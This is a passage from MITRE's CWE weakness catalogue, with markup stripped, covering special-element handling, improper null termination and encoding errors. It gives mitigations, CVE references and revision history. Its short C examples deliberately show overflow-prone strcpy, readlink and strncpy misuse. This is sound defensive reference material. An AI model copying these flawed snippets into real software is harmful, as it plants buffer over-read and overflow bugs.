Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Multiple Trailing Special Elements + Failure to Sanitize Multiple Trailing Special Elements + Improper Sanitization of Multiple Trailing Special Elements + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component. + As data is parsed, improperly handled internal special elements may cause the process to take unexpected actions that result in an attack. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that internal special elements will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Internal Special Element + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Internal Special Element + Failure to Sanitize Internal Special Element + Improper Sanitization of Internal Special Elements + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component. + As data is parsed, improperly handled multiple internal special elements may cause the process to take unexpected actions that result in an attack. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that multiple internal special elements will be injected/removed/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Multiple Internal Special Element + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Multiple Internal Special Elements + Failure to Sanitize Multiple Internal Special Elements + Improper Sanitization of Multiple Internal Special Elements + + + + The product receives input from an upstream component, but it does not handle or incorrectly handles when an expected special element is missing. + + + + + + + + + + Implementation + + + + + Availability + DoS: Crash, Exit, or Restart + + + + + Developers should anticipate that special elements will be removed in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-1362 + Crash via message type without separator character + https://www.cve.org/CVERecord?id=CVE-2002-1362 + + + CVE-2002-0729 + Missing special character (separator) causes crash + https://www.cve.org/CVERecord?id=CVE-2002-0729 + + + CVE-2002-1532 + HTTP GET without \r\n\r\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it + https://www.cve.org/CVERecord?id=CVE-2002-1532 + + + + + Missing Special Element + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Missing Special Element + Failure to Handle Missing Special Element + + + + The product receives input from an upstream component, but it does not handle or incorrectly handles when an additional unexpected special element is provided. + + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Developers should anticipate that extra special elements will be injected in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2000-0116 + Extra "<" in front of SCRIPT tag. + https://www.cve.org/CVERecord?id=CVE-2000-0116 + + + CVE-2001-1157 + Extra "<" in front of SCRIPT tag. + https://www.cve.org/CVERecord?id=CVE-2001-1157 + + + CVE-2002-2086 + "<script" - probably a cleansing error + https://www.cve.org/CVERecord?id=CVE-2002-2086 + + + + + Extra Special Element + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Extra Special Element + Failure to Handle Additional Special Element + + + + The product does not properly handle input in which an inconsistency exists between two or more special characters or reserved words. + An example of this problem would be if paired characters appear in the wrong order, or if the special characters are not properly nested. + + + + + + + + + + Implementation + + + + + Availability + Access Control + Non-Repudiation + DoS: Crash, Exit, or Restart + Bypass Protection Mechanism + Hide Activities + + + + + Developers should anticipate that inconsistent special elements will be injected/manipulated in the input vectors of their product. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Inconsistent Special Elements + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Inconsistent Special Elements + Failure to Resolve Inconsistent Special Elements + + + + The product does not terminate or incorrectly terminates a string or array with a null character or equivalent terminator. + Null termination errors frequently occur in two different ways. An off-by-one error could cause a null to be written out of bounds, leading to an overflow. Or, a program could use a strncpy() function call incorrectly, which prevents a null terminator from being added at all. Other scenarios are possible. + + + + + + + + + + + + Resultant + + + + + + + + + Implementation + + + Medium + + + Confidentiality + Integrity + Availability + Read Memory + Execute Unauthorized Code or Commands + The case of an omitted null character is the most dangerous of the possible issues. This will almost certainly result in information disclosure, and possibly a buffer overflow condition, which may be exploited to execute arbitrary code. + + + Confidentiality + Integrity + Availability + DoS: Crash, Exit, or Restart + Read Memory + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + If a null character is omitted from a string, then most string-copying functions will read data until they locate a null character, even outside of the intended boundaries of the string. This could: cause a crash due to a segmentation fault cause sensitive adjacent memory to be copied and sent to an outsider trigger a buffer overflow when the copy is being written to a fixed-size buffer. + + + Integrity + Availability + Modify Memory + DoS: Crash, Exit, or Restart + Misplaced null characters may result in any number of security problems. The biggest issue is a subset of buffer overflow, and write-what-where conditions, where data corruption occurs from the writing of a null character over valid data, or even instructions. A randomly placed null character may put the system into an undefined state, and therefore make it prone to crashing. A misplaced null character may corrupt other data in memory. + + + Integrity + Confidentiality + Availability + Access Control + Other + Alter Execution Logic + Execute Unauthorized Code or Commands + Should the null character corrupt the process flow, or affect a flag controlling access, it may lead to logical errors which allow for the execution of arbitrary code. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Requirements + Use a language that is not susceptible to these issues. However, be careful of null byte interaction errors (CWE-626) with lower-level constructs that may be written in a language that is susceptible. + + + Implementation + Ensure that all string functions used are understood fully as to how they append null characters. Also, be wary of off-by-one errors when appending nulls to the end of strings. + + + Implementation + If performance constraints permit, special code can be added that validates null-termination of string buffers, this is a rather naive and error-prone solution. + + + Implementation + Switch to bounded string manipulation functions. Inspect buffer lengths involved in the buffer overrun trace reported with the defect. + + + Implementation + Add code that fills buffers with nulls (however, the length of buffers still needs to be inspected, to ensure that the non null-terminated string is not written at the physical end of the buffer). + + + + + The following code reads from cfgfile and copies the input into inputbuf using strcpy(). The code mistakenly assumes that inputbuf will always contain a NULL terminator. + + #define MAXLEN 1024...char *pathbuf[MAXLEN];...read(cfgfile,inputbuf,MAXLEN); //does not null terminatestrcpy(pathbuf,inputbuf); //requires null terminated input... + + The code above will behave correctly if the data read from cfgfile is null terminated on disk as expected. But if an attacker is able to modify this input so that it does not contain the expected NULL character, the call to strcpy() will continue copying from memory until it encounters an arbitrary NULL character. This will likely overflow the destination buffer and, if the attacker can control the contents of memory immediately following inputbuf, can leave the application susceptible to a buffer overflow attack. + + + In the following code, readlink() expands the name of a symbolic link stored in pathname and puts the absolute path into buf. The length of the resulting value is then calculated using strlen(). + + char buf[MAXPATH];...readlink(pathname, buf, MAXPATH);int length = strlen(buf);... + + The code above will not always behave correctly as readlink() does not append a NULL byte to buf. Readlink() will stop copying characters once the maximum size of buf has been reached to avoid overflowing the buffer, this will leave the value buf not NULL terminated. In this situation, strlen() will continue traversing memory until it encounters an arbitrary NULL character further on down the stack, resulting in a length value that is much larger than the size of string. Readlink() does return the number of bytes copied, but when this return value is the same as stated buf size (in this case MAXPATH), it is impossible to know whether the pathname is precisely that many bytes long, or whether readlink() has truncated the name to avoid overrunning the buffer. In testing, vulnerabilities like this one might not be caught because the unused contents of buf and the memory immediately following it may be NULL, thereby causing strlen() to appear as if it is behaving correctly. + + + While the following example is not exploitable, it provides a good example of how nulls can be omitted or misplaced, even when "safe" functions are used: + + #include <stdio.h>#include <string.h> + int main() { + + char longString[] = "String signifying nothing";char shortString[16]; + strncpy(shortString, longString, 16);printf("The last character in shortString is: %c (%1$x)\n", shortString[15]);return (0); + } + + The above code gives the following output: "The last character in shortString is: n (6e)". So, the shortString array does not end in a NULL character, even though the "safe" string function strncpy() was used. The reason is that strncpy() does not impliciitly add a NULL character at the end of the string when the source is equal in length or longer than the provided size. + + + + + CVE-2000-0312 + Attacker does not null-terminate argv[] when invoking another program. + https://www.cve.org/CVERecord?id=CVE-2000-0312 + + + CVE-2003-0777 + Interrupted step causes resultant lack of null termination. + https://www.cve.org/CVERecord?id=CVE-2003-0777 + + + CVE-2004-1072 + Fault causes resultant lack of null termination, leading to buffer expansion. + https://www.cve.org/CVERecord?id=CVE-2004-1072 + + + CVE-2001-1389 + Multiple vulnerabilities related to improper null termination. + https://www.cve.org/CVERecord?id=CVE-2001-1389 + + + CVE-2003-0143 + Product does not null terminate a message buffer after snprintf-like call, leading to overflow. + https://www.cve.org/CVERecord?id=CVE-2003-0143 + + + CVE-2009-2523 + Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122). + https://www.cve.org/CVERecord?id=CVE-2009-2523 + + + + + Improper Null Termination + + + String Termination Error + + + Miscalculated null termination + + + A9 + Denial of Service + CWE More Specific + + + POS30-C + Use the readlink() function properly + CWE More Abstract + + + STR03-C + Do not inadvertently truncate a null-terminated byte string + + + STR32-C + Do not pass a non-null-terminated character sequence to a library function that expects a string + Exact + + + SFP11 + Improper Null Termination + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Factors: this is usually resultant from other weaknesses such as off-by-one errors, but it can be primary to boundary condition violations such as buffer overflows. In buffer overflows, it can act as an expander for assumed-immutable data. + Overlaps missing input terminator. + + Conceptually, this does not just apply to the C language; any language or representation that involves a terminator could have this type of problem. + + As currently described, this entry is more like a category than a weakness. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Causal_Nature, Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Common_Consequences + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated Common_Consequences, Other_Notes, Potential_Mitigations, White_Box_Definitions + + + CWE Content Team + MITRE + 2009-10-29 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Observed_Examples, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2018-03-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly encode or decode the data, resulting in unexpected values. + + + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + Encoding Error + + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + Partially overlaps path traversal and equivalence weaknesses. + This is more like a category than a weakness. + Many other types of encodings should be listed in this category. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly handle when an input uses an alternate encoding that is valid for the control sphere to which the input is being sent. + + + + + + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Architecture and Design + Input Validation + Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Output Encoding + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and 